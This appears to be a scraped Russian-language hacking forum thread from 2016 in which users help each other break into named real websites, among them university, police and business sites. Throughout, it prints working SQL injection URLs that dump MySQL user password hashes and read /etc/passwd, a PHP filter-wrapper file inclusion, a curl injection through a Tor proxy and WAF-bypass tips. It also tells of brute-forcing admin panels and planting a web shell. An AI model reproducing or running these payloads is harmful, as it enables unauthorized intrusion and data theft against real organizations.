Exploit: _ttps://www.exploit-db.com/exploits/36664/ (http://www.exploit-db.com/exploits/36664/)
kacergei
04.11.2016, 04:44
Как отфильтровать сайты в burpsuite? отображать только домен и его поддомены не зависимо от https/http
http://joxi.ru/GrqMLEyHQN0GLr
DezMond™
04.11.2016, 20:58
http://gwps.org/36.0.html?&action=showDetails&showid=72
Как раскрутить? как слепая тоже не крутиться(
Таблица be_users колонка usename
Немогу данные выковырять
BabaDook
05.11.2016, 11:45
Всем привет. Стыдно конечно спрашивать но всё же век живи, век учись
1 -
PHP:
http://www.naval.iitkgp.ernet.in/menu.php?page=pagedisplay&id=mission%27+and+false+UnioN+SeLect+1,user(),3,4, 5,6,7,8,9,10,11,12+--+-
2-
PHP:
http://www.police.gov.bd/Police-activities.php?id=271%27+and+false+UnIoN+SeLecT+1, 2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16++--+-
как прочитать файл
DezMond™
05.11.2016, 16:37
BabaDook said:
↑ (https://antichat.live/posts/4009586/)
Всем привет. Стыдно конечно спрашивать но всё же век живи, век учись
1 -
PHP:
http://www.naval.iitkgp.ernet.in/menu.php?page=pagedisplay&id=mission%27+and+false+UnioN+SeLect+1,user(),3,4, 5,6,7,8,9,10,11,12+--+-
2-
PHP:
http://www.police.gov.bd/Police-activities.php?id=271%27+and+false+UnIoN+SeLecT+1, 2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16++--+-
как прочитать файл
LOAD_FILE('/etc/passwd') вместо user()
BabaDook said:
↑ (https://antichat.live/posts/4009586/)
Всем привет. Стыдно конечно спрашивать но всё же век живи, век учись
1 -
PHP:
http://www.naval.iitkgp.ernet.in/menu.php?page=pagedisplay&id=mission%27+and+false+UnioN+SeLect+1,user(),3,4, 5,6,7,8,9,10,11,12+--+-
2-
PHP:
http://www.police.gov.bd/Police-activities.php?id=271%27+and+false+UnIoN+SeLecT+1, 2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16++--+-
как прочитать файл
1
http://www.naval.iitkgp.ernet.in/me...file('/etc/passwd'),3,4,5,6,7,8,9,10,11,12--+ (http://www.naval.iitkgp.ernet.in/menu.php?page=pagedisplay&id=mission%27+and+false+UnioN+SeLect+1,load_file(% 27/etc/passwd%27),3,4,5,6,7,8,9,10,11,12--+)
или
http://www.naval.iitkgp.ernet.in/me...74632F706173737764),3,4,5,6,7,8,9,10,11,12--+ (http://www.naval.iitkgp.ernet.in/menu.php?page=pagedisplay&id=mission%27+and+false+UnioN+SeLect+1,load_file(0 x2F6574632F706173737764),3,4,5,6,7,8,9,10,11,12--+)
где 0x2F6574632F706173737764= hex(/etc/passwd)
2
нет доступа к mysql.user то есть нет возможности прочитать файл,несмотря на то что пользователь root, root'ом не является
DezMond™ said:
↑ (https://antichat.live/posts/4009417/)
http://gwps.org/36.0.html?&action=showDetails&showid=72
Как раскрутить? как слепая тоже не крутиться(
Таблица be_users колонка usename
Немогу данные выковырять
havij видит что то http://prnt.sc/d3e4kj
но увы mysql=4.0.27
в ручную пока не могу составить запрос
DezMond™
05.11.2016, 17:47
qqq1457 said:
↑ (https://antichat.live/posts/4009640/)
1
http://www.naval.iitkgp.ernet.in/menu.php?page=pagedisplay&id=mission'+and+false+UnioN+SeLect+1,load_file('/etc/passwd'),3,4,5,6,7,8,9,10,11,12--+ (http://www.naval.iitkgp.ernet.in/menu.php?page=pagedisplay&id=mission%27+and+false+UnioN+SeLect+1,load_file(% 27/etc/passwd%27),3,4,5,6,7,8,9,10,11,12--+)
или
http://www.naval.iitkgp.ernet.in/menu.php?page=pagedisplay&id=mission'+and+false+UnioN+SeLect+1,load_file(0x2 F6574632F706173737764),3,4,5,6,7,8,9,10,11,12--+ (http://www.naval.iitkgp.ernet.in/menu.php?page=pagedisplay&id=mission%27+and+false+UnioN+SeLect+1,load_file(0 x2F6574632F706173737764),3,4,5,6,7,8,9,10,11,12--+)
где 0x2F6574632F706173737764= hex(/etc/passwd)
2
нет доступа к mysql.user то есть нет возможности прочитать файл,несмотря на то что пользователь root, root'ом не является
http://www.naval.iitkgp.ernet.in/me...rd),3,4,5,6,7,8,9,10,11,12+from+mysql.user--+ (http://www.naval.iitkgp.ernet.in/menu.php?page=pagedisplay&id=mission%27+and+false+UnioN+SeLect+1,concat_ws(0 x3a,user,password),3,4,5,6,7,8,9,10,11,12+from+mys ql.user--+)
root:*29EAFC3EEB29D66A3630CAA03C557B3083B2975B
всё там нормально
DezMond™
05.11.2016, 17:50
qqq1457 said:
↑ (https://antichat.live/posts/4009655/)
havij видит что то
http://prnt.sc/d3e4kj
но увы mysql=4.0.27
в ручную пока не могу составить запрос
Это я видел. Должен быть вывод....
DezMond™ said:
↑ (https://antichat.live/posts/4009656/)
http://www.naval.iitkgp.ernet.in/menu.php?page=pagedisplay&id=mission'+and+false+UnioN+SeLect+1,concat_ws(0x3 a,user,password),3,4,5,6,7,8,9,10,11,12+from+mysql .user--+ (http://www.naval.iitkgp.ernet.in/menu.php?page=pagedisplay&id=mission%27+and+false+UnioN+SeLect+1,concat_ws(0 x3a,user,password),3,4,5,6,7,8,9,10,11,12+from+mys ql.user--+)
root:*29EAFC3EEB29D66A3630CAA03C557B3083B2975B
всё там нормально
я про 2 вариант
http://www.police.gov.bd/Police-act...user(),4,5,6,7,8,9,10,11,12,13,14,15,16++--+- (http://www.police.gov.bd/Police-activities.php?id=271%27+and+false+UnIoN+SeLecT+1, 2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16++--+-)
BabaDook
05.11.2016, 18:38
Спасибо кто откликнулся.
В первом сайте интересен запрос table_name from information_schema.tables where table_name=database()/
в втором сайте интересней чтение файла. Сори а то что сразу не смог задать нормально вопрос.
IMMORTAL_S
08.11.2016, 07:19
Всем привет!
На странице есть ckeditor с возможностью загружать файлы на сервер.
- заливать можно всё
- имена файлов переименовывается, так что залить .htaccess не получится
- имена после заливки известны
- php, php3, phtml (возможно и другие, больше не пробовал, боюсь мою кучу говна скоро обнаружат) не выполняются, скачиваются
- shtml открывается, но так же не выполняется (судя по всему там хрен что выполняется)
Свои идеи иссякли, а останавливаться на достигнутом не хочется, так что прошу поделиться идеями, размышлениями на тему заливки рабочего шелла и т.п. вещей.
Не уверен что с html+js можно что-то придумать, может какой perl сгодится или еще что, но в этом я уже не силен.
Да кстати, хоть ckeditor версии 4.0.1, толку от этого нет, т.к. папка samples отсутствует.
И еще проверил pl, чтоб наверняка, тоже понятное дело скачивается.
WallHack
08.11.2016, 09:17
Помогите раскрутить LFI
_ttp://lidodo.astro.ncu.edu.tw/2015ATITC/index.php?page=../../../etc/passwd
WallHack said:
↑ (https://antichat.live/posts/4010793/)
Помогите раскрутить LFI
_ttp://lidodo.astro.ncu.edu.tw/2015ATITC/index.php?page=../../../etc/passwd
?page=file:///etc/passwd
BabaDook
08.11.2016, 18:58
ZodiaX said:
↑ (https://antichat.live/posts/4010989/)
?page=file:///etc/passwd
Вроде как указал автор работает. Не очень понятно что требуется
http://lidodo.astro.ncu.edu.tw/phpMyAdmin/index.php есть phpmyadmin можно попробывать пробрутить
версия http://lidodo.astro.ncu.edu.tw/phpMyAdmin//doc/html/index.html
qqq1457 said:
↑ (https://antichat.live/posts/4011017/)
http://lidodo.astro.ncu.edu.tw/phpMyAdmin/index.php
есть phpmyadmin можно попробывать пробрутить
версия
http://lidodo.astro.ncu.edu.tw/phpMyAdmin//doc/html/index.html
не надо ничего брутить, врапперы вам на что в пыхе? читайте сорцы сайта
Octavian
08.11.2016, 21:59
помогите наити админку
http://icfi.ulim.md
BabaDook
08.11.2016, 22:36
Octavian said:
↑ (https://antichat.live/posts/4011061/)
помогите наити админку
http://icfi.ulim.md
Неужели ты эту уязвимость раскрутил
http://icfi.ulim.md/alltopics.php?cat=sleep(12)
Поищи тут может найдёшь, я думаю она где-то спрятана
ftp.ulim.md
moodle.ulim.md
git.ulim.md
gw.ulim.md
domain.ulim.md
files.ulim.md
redmine.ulim.md
s.ulim.md
vm.ulim.md
BabaDook
10.11.2016, 17:02
Здравствуйте дорогие. Прошу вас показать щеглу как надо кутить скульки
http://www.caresoft.ind.in/info.php?show=185
WallHack said:
↑ (https://antichat.live/posts/4010793/)
Помогите раскрутить LFI
_ttp://lidodo.astro.ncu.edu.tw/2015ATITC/index.php?page=../../../etc/passwd
http://lidodo.astro.ncu.edu.tw/2015...rt.base64-encode/resource=../../../etc/passwd (http://lidodo.astro.ncu.edu.tw/2015ATITC/index.php?page=php://filter/convert.base64-encode/resource=../../../etc/passwd)
исходный код можем читать
Спасибо.
BabaDook said:
↑ (https://antichat.live/posts/4011686/)
Здравствуйте дорогие. Прошу вас показать щеглу как надо кутить скульки
http://www.caresoft.ind.in/info.php?show=185
http://lidodo.astro.ncu.edu.tw/2015...rt.base64-encode/resource=../../../etc/passwd (http://lidodo.astro.ncu.edu.tw/2015ATITC/index.php?page=php://filter/convert.base64-encode/resource=../../../etc/passwd)
исходный код можем читать
Спасибо.
Code:
curl -s -k --proxy socks5://127.0.0.1:9150 -A 'mozilla' 'http://www.caresoft.ind.in/info.php' --data 'show=185+union+select+1,2,3,4,concat(999,char(58) ,version()),6,7+--+s' | grep 999
999:5.1.68-community
BabaDook said:
↑ (https://antichat.live/posts/4011703/)
Что же ты злой такой сегодня?
Как кошечка шипишь сегодня на всех.
да и как не злиться на людей который выкладывают дамп ачата на ачате?
по врапперам кстати неплохая шпаргалка
https://www.ptsecurity.com/ru-ru/ics/А.Москвин_О_безоп_исп_РНР_wrap pers.pdf (https://www.ptsecurity.com/ru-ru/ics/%D0%90.%D0%9C%D0%BE%D1%81%D0%BA%D0%B2%D0%B8%D0%BD_ %D0%9E_%D0%B1%D0%B5%D0%B7%D0%BE%D0%BF_%D0%B8%D1%81 %D0%BF_%D0%A0%D0%9D%D0%A0_wrappers.pdf)
сорцы не смотрел в итоге? там забавный мускул пользователь с такими грантами что можно поменять хэш рутового мускул пользователя
WallHack said:
↑ (https://antichat.live/posts/4010793/)
Помогите раскрутить LFI
_ttp://lidodo.astro.ncu.edu.tw/2015ATITC/index.php?page=../../../etc/passwd
шелл залил в пм написал
WallHack
11.11.2016, 04:54
qqq1457 said:
↑ (https://antichat.live/posts/4011878/)
шелл залил в пм написал
Спасибо, поторопился я с выводами.
подкиньте мысль, boolen-based скуль, waf фильтрует "union" ")" "/" "="
какие могут быть варианты запросов?
= можно обойти оператором "like", / в общем то не особо и нужен, за union я уже смирился, но вот чертова закрывающая скобка -_- ( именно waf, потому что в хедерах есть статус Waf-Capulta: Passed/Blocked )
даблурлэнкод пробовал
post/get waf обрабатывает, через cookie данные не уходят
потыкать можно тут ringzer0team.com ( sqlj последний таск "Internet As A Service (https://ringzer0team.com/challenges/242)" )
-------------------------
что удалось узнать, все эти запросы как то связаны со https://ringzer0team.slack.com ( то есть с slack.com )
правда при чем тут мускул не понятно, не одного нормального примера кода в интернетах не нашел
в запросе присутствуют поля url,title,description
некоторые параметры бд
storage_engine = InnoDB
hostname = lxc26-sql-search
version = 5.5.50-0ubuntu0.14.04.1
sql_mode = NULL
datadir = /var/lib/mysql
в корне сайт два бесполезных файла
/files/test.txt
/files/useless.txt (http://ringzer0team.com:20006/files/useless.txt)
karkajoi
13.11.2016, 16:09
Подскажите пож, каким запросом посмотреть базы данных которые лежат рядом?
если в mysql
select schema_name from information_schema.schemata limit 0,1 - выводит названия бд далее limit 1,1 ; limit 2,1 и т д
select table_name from information_schema.tables where table_schema='название бд которую вывел в пред запросе'
или если не выводит в hex
select table_name from information_schema.tables where table_schema=0x002.....
/threads/43966/ (https://antichat.live/threads/43966/)
Подскажите как забрать базу sql если к ней нет доступа из инета?
Мож скриптик какой есть?
Provider=SQLOLEDB.1
Data Source=.\SQLEXPRESS
karkajoi
14.11.2016, 03:13
hiderat said:
↑ (https://antichat.live/posts/4012861/)
Подскажите как забрать базу sql если к ней нет доступа из инета?
Мож скриптик какой есть?
Provider=SQLOLEDB.1
Data Source=.\SQLEXPRESS
Скрипт называется WebShell (WSO), только он работает локально. В нем есть функция подключения к бд
Octavian
14.11.2016, 20:09
Можно прочитать даныи фаил через скулю?прочитать?
http://icfi.ulim.md/blocks/db.php
http://icfi.ulim.md/alltopics.php?cat=3+union+select+1,2,3,4,5,6,7,8,9 +--+
Octavian said:
↑ (https://antichat.live/posts/4013083/)
Можно прочитать даныи фаил через скулю?прочитать?
http://icfi.ulim.md/blocks/db.php
http://icfi.ulim.md/alltopics.php?cat=3+union+select+1,2,3,4,5,6,7,8,9 +--+
нет прочитать нельзя.
Code:
Web Server: Apache/2.2.22 (Ubuntu)
Powered-by: PHP/5.3.10-1ubuntu3.18
Current DB: icfi
Data Bases: information_schema
icfi
test
http://icfi.ulim.md/phpmyadmin/
http://icfi.ulim.md/phpmyadmin/Documentation.html
phpMyAdmin 3.4.10.1
phpMyAdmin 3.3.x / 3.4.x - Local File Inclusion via XXE Injection (Metasploit)
Столкнулся с небольшой проблемой при эксплуатации error-based инъекции. GET запрос лимитирован до 255 символов. Все доступные вектора больше этого лимита (короткие типа extractvalue, updatexml, bigint overflow - не работают). Подскажите пути решения проблемы.
winstrool
18.11.2016, 13:25
Попробуй уязвимый параметр передать через POST
winstrool said:
↑ (https://antichat.live/posts/4014454/)
Попробуй уязвимый параметр передать через POST
По-сути там даже не параметра. Только GET.
BabaDook said:
↑ (https://antichat.live/posts/4014459/)
sute.ru/index.php' такая чтоль уязвимость? или site.org/index.php/'
Второе.
BabaDook
19.11.2016, 00:46
http://www.vitrinesvesoul.fr/annuaire.php?cat=5
через юнион как раскрутить ?
http://www.vitrinesvesoul.fr/annuai...CHEMA.CHARACTER_SETS+GROUP+BY+x)a)+AND+'1 '='1 (http://www.vitrinesvesoul.fr/annuaire.php?cat=5%27+AND+(SELECT+1+FROM(SELECT+CO UNT(*),CONCAT(0x71,(SELECT+(version())),0x71,FLOOR (RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SE TS+GROUP+BY+x)a)+AND+%271%27=%271)
через юнион не выводится
http://www.vitrinesvesoul.fr/annuaire.php?cat=5'+union+select+1,2,3,4,5,6,7,8--+ (http://www.vitrinesvesoul.fr/annuaire.php?cat=5%27+union+select+1,2,3,4,5,6,7,8--+)
полей 8 вывода не нашел
winstrool
19.11.2016, 15:36
BabaDook said:
↑ (https://antichat.live/posts/4014661/)
http://www.vitrinesvesoul.fr/annuaire.php?cat=5
через юнион как раскрутить ?
не выводится из за нарушение логики выполнения скрипта, вот в другом вывод
_ttp://
www.vitrinesvesoul.fr/annuaire_page.php?NumPage=-155+union+select+1,(select(@x)from(select(@x:=0x00 ),(select(0)from(information_schema.columns)where( table_schema!=0x696e666f726d6174696f6e5f736368656d 61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_sche ma,0x2e,table_name,0x3a,column_name))))x),3,4,5,6, 7,8,9,0,11,12,13,14,15,16,17,18,19,20+--+ (http://www.vitrinesvesoul.fr/annuaire_page.php?NumPage=-155+union+select+1,(select(@x)from(select(@x:=0x00 ),(select(0)from(information_schema.columns)where( table_schema!=0x696e666f726d6174696f6e5f736368656d 61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_sche ma,0x2e,table_name,0x3a,column_name))))x),3,4,5,6, 7,8,9,0,11,12,13,14,15,16,17,18,19,20+--+)
мудрено но годно хотя програмно это все быстро выводится
winstrool
19.11.2016, 16:15
qqq1457 said:
↑ (https://antichat.live/posts/4014838/)
мудрено но годно хотя програмно это все быстро выводится
Программно это через error вектор в несколько десятков потоков? Нужно учиться самому, так больше пользы будет и эффекта в поисках уязвимостей, и не всегда программа может пройти там, где сможете пройти вы!
BabaDook
19.11.2016, 16:38
winstrool said:
↑ (https://antichat.live/posts/4014828/)
не выводится из за нарушение логики выполнения скрипта, вот в другом вывод
Спасибо.
BabaDook
19.11.2016, 16:38
qqq1457 said:
↑ (https://antichat.live/posts/4014838/)
мудрено но годно хотя программно это все быстро выводится
а что там мудрёного , программно не быстрее кстати
BabaDook said:
↑ (https://antichat.live/posts/4014847/)
а что там мудрёного , программно не быстрее кстати
не соглашусь
winstrool said:
↑ (https://antichat.live/posts/4014844/)
Программно это через error вектор в несколько десятков потоков? Нужно учиться самому, так больше пользы будет и эффекта в поисках уязвимостей, и не всегда программа может пройти там, где сможете пройти вы!
сам умею + програмно тоже настраивать нужно уметь
qqq1457 said:
↑ (https://antichat.live/posts/4014885/)
сам умею + програмно тоже настраивать нужно уметь
если ситуация не как в фильме пароль рыба-меч, то программную составляющую можно реализовать самому, всё же получение правильного/работающего вектора это главное, человек думает, софт делает)
DezMond™
26.11.2016, 20:13
Помогите найти админку
www.culinair.net (http://www.culinair.net)
www.slijtersvakblad.nl (http://www.slijtersvakblad.nl)
это не адмика www.slijtersvakblad.nl/manager/ (http://www.slijtersvakblad.nl/manager/)
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot